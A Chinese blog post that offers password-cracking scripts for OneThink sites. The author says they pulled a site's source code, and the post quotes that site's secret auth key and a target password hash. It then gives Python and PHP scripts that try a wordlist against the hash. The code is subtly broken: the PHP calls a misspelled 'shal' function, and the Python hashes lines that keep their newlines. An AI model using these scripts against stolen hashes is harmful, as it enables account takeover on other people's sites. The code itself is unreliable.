密码爆破脚本

时间:2022-09-09 16:24:02

昨天遇到一个基于onethink开发的程序。源码是脱下来了。但是密码始终破解不了。来看看加密函数

function think_ucenter_md5($str, $key = 'ThinkUCenter'){
	return '' === $str ? '' : md5(sha1($str) . $key);
}

if(is_array($user) && $user['status']){
			/* 验证用户密码 */
			if(think_ucenter_md5($password, UC_AUTH_KEY) === $user['password']){
				$this->updateLogin($user['id']); //更新用户登录信息
				return $user['id']; //登录成功,返回用户ID
			} else {
				return -2; //密码错误
			}

define('UC_AUTH_KEY', 'W#RZ5cfy1n]Qk3zu2HvgqC@>Gt0%&P|DJr{^EM9!'); 

总感觉无法可逆,所以只能爆破,有更好方法的大大,介绍给我

py版本

#coding:utf-8
#author:jwong

import hashlib
key = 'W#RZ5cfy1n]Qk3zu2HvgqC@>Gt0%&P|DJr{^EM9!'
result = '9fdf7c3ba521d12db4d56540eb1bca15'

def md5(str):
    m = hashlib.md5()
    m.update(str)
    return m.hexdigest()
def sha1(str):
    s = hashlib.sha1()
    s.update(str)
    return s.hexdigest()

def main():
    try:
        with open('password.txt','rb') as f:
            for line in f.readlines():
                print "trying: %s " % line
                str1 = sha1(line) + key
                password = md5(str1)
                if password == result:
                    print 'password is %s ' % line

    except Exception, e:
        print 'could not open file' , e

if __name__ == '__main__':
    main()

php版本

<?php
$filename = 'password.txt';

$lines = @file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) or die('file not fount!');
$key = 'W#RZ5cfy1n]Qk3zu2HvgqC@>Gt0%&P|DJr{^EM9!';
$md5_pass = "9fdf7c3ba521d12db4d56540eb1bca15";
foreach($lines as $line){
    $str1 = md5(shal($line).$key);
    if($str1 == $md5_pass){
        echo 'password: '.$line;
        break;
    }
}
?>